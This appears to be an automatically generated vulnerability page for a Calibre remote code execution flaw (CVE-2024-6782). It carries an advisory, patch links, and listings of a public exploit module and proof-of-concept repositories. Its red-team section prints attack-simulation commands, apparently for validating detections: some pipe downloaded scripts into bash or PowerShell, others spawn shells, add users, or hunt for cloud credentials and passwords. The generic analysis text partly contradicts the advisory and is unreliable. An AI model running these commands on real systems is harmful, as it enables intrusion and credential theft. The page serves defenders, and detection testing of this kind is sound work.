CVE-2024-6782
Overview
The vulnerability in Calibre arises from improper access control mechanisms within its internal components, specifically affecting versions 6.9.0 through 7.14.0. The root cause is the lack of authentication enforcement on critical functions, allowing unauthorized users to invoke privileged operations. This flaw resides in the access control logic governing remote command execution interfaces.
Vulnerability Description
Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.
Impact
An unauthenticated attacker with network access can exploit this vulnerability to execute arbitrary code remotely on affected Calibre installations, potentially gaining full control over the system. No user interaction or prior authentication is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can lead to unauthorized data access, system compromise, and disruption of service in environments where Calibre is deployed.
Solution
Users should upgrade Calibre to version 7.14.1 or later, where authentication enforcement has been implemented as per the fix detailed in the GitHub commit https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9. The advisory available at https://starlabs.sg/advisories/24/24-6782/ provides additional guidance on patch application. No known workarounds exist; applying the vendor patch is necessary to remediate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper access control mechanisms within specific versions of Calibre, a popular open-source e-book management application. This flaw allows unauthenticated attackers to execute arbitrary code remotely, significantly compromising the integrity and confidentiality of systems running the affected software. The root cause of this vulnerability lies in the application's failure to adequately validate user permissions before granting access to sensitive functionalities. Attackers can exploit this weakness by sending crafted requests to the application, which may lead to unauthorized access and the execution of malicious payloads on the server.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting web interfaces or APIs exposed by the application. An attacker could leverage social engineering techniques to trick a user into interacting with a malicious link, or they might directly probe the application for weaknesses. Once the attacker successfully exploits the vulnerability, they can execute arbitrary commands on the server, potentially leading to a full system compromise. This could enable the attacker to install malware, exfiltrate sensitive data, or even pivot to other systems within the network, escalating their access and control.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Calibre for managing e-books and related content. The high CVSS score indicates a critical level of risk, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of intellectual property, and reputational damage. For businesses, the financial implications could be significant, encompassing costs related to incident response, recovery efforts, and potential legal liabilities stemming from data protection regulations. Furthermore, the ability for attackers to execute code remotely amplifies the threat landscape, as it can facilitate widespread attacks across interconnected systems.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Calibre application to the latest version is crucial, as software vendors typically release patches to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter malicious traffic and block exploitation attempts. Organizations should also conduct routine security assessments, including penetration testing and vulnerability scanning, to identify and remediate weaknesses in their systems. Furthermore, implementing strict access controls and monitoring user activity can help limit the potential impact of an exploitation attempt, ensuring that only authorized personnel can access sensitive functionalities.
In conclusion, the improper access control vulnerability in Calibre presents a significant threat to organizations utilizing this software for e-book management. The potential for remote code execution by unauthenticated attackers underscores the importance of maintaining robust security practices. By staying vigilant and proactive in their security measures, organizations can mitigate the risks associated with this vulnerability and protect their systems from exploitation.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Calibre Python Code Injection (CVE-2024-6782)
exploits/multi/misc/calibre_exec
|
Amos Ng, Michael Heinzl | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zangjiahe/CVE-2024-6782
Calibre 远程代码执行(CVE-2024-6782)Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achiev...
|
zangjiahe | 6 | 3 | 2024-08-06 | View |
|
0xB0y426/CVE-2024-6782-PoC
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
|
0xB0y426 | 1 | 0 | 2024-09-15 | View |
|
jdpsl/CVE-2024-6782
Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.
|
jdpsl | 0 | 0 | 2024-08-09 | View |
|
NketiahGodfred/CVE-2024-6782
Calibre Remote Code Execution
|
NketiahGodfred | 0 | 0 | 2024-12-07 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6782 |
| starlabs.sg |
GitHub CVE
third-party-advisory
|
https://starlabs.sg/advisories/24/24-6782/ |
| github.com |
GitHub CVE
patch
|
https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9 |